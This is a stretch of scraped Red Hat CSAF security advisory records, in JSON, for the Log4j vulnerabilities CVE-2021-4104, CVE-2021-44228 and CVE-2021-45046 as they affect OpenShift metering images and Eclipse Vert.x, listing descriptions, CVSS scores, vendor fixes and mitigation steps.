"external", "summary": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx", "url": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/13/1", "url": "https://www.openwall.com/lists/oss-security/2021/12/13/1" } ], "release_date": "2021-12-10T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-15T20:09:32+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html", "product_ids": [ 
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5148" }, { "category": "workaround", "details": "These are the possible mitigations for this flaw for releases version 1.x:\n\n- Comment out or remove JMSAppender in the Log4j configuration if it is used\n- Remove the JMSAppender class from the classpath. For example:\n```\nzip -q -d log4j-*.jar org/apache/log4j/net/JMSAppender.class\n```\n- Restrict access for the OS user on the platform running the application to prevent modifying the Log4j configuration by the attacker.", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", 
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ 
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": 
"2021-12-15T20:09:32+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5148" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": 
"2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": 
"https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-15T20:09:32+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5148" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ 
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2021_5093
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Red Hat build of Eclipse Vert.x.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE pages listed in the References section.", "title": "Topic" }, { "category": "general", "text": "This release of Red Hat build of Eclipse Vert.x 4.1.5 SP1 includes security updates. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5093", "url": "https://access.redhat.com/errata/RHSA-2021:5093" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=catRhoar.eclipse.vertx\u0026version=4.1.5.SP1", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=catRhoar.eclipse.vertx\u0026version=4.1.5.SP1" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.1/html/release_notes_for_eclipse_vert.x_4.1/index", "url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.1/html/release_notes_for_eclipse_vert.x_4.1/index" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5093.json" } ], "title": "Red Hat Security Advisory: Red Hat build of Eclipse Vert.x 4.1.5 SP1 security update", "tracking": { "current_release_date": 
"2024-12-12T01:17:48+00:00", "generator": { "date": "2024-12-12T01:17:48+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5093", "initial_release_date": "2021-12-14T16:00:56+00:00", "revision_history": [ { "date": "2021-12-14T16:00:56+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T16:00:56+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:48+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Vert.x 4.1.5 SP1", "product": { "name": "Vert.x 4.1.5 SP1", "product_id": "Vert.x 4.1.5 SP1", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_application_runtimes:1.0" } } } ], "category": "product_family", "name": "Red Hat OpenShift Application Runtimes" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Vert.x 4.1.5 SP1" 
] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T16:00:56+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nThe References section of this erratum contains a download link for the update. 
You must be logged in to download the update.", "product_ids": [ "Vert.x 4.1.5 SP1" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5093" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Vert.x 4.1.5 SP1" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Vert.x 4.1.5 SP1" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5128
Vulnerability from csaf_redhat
Notes
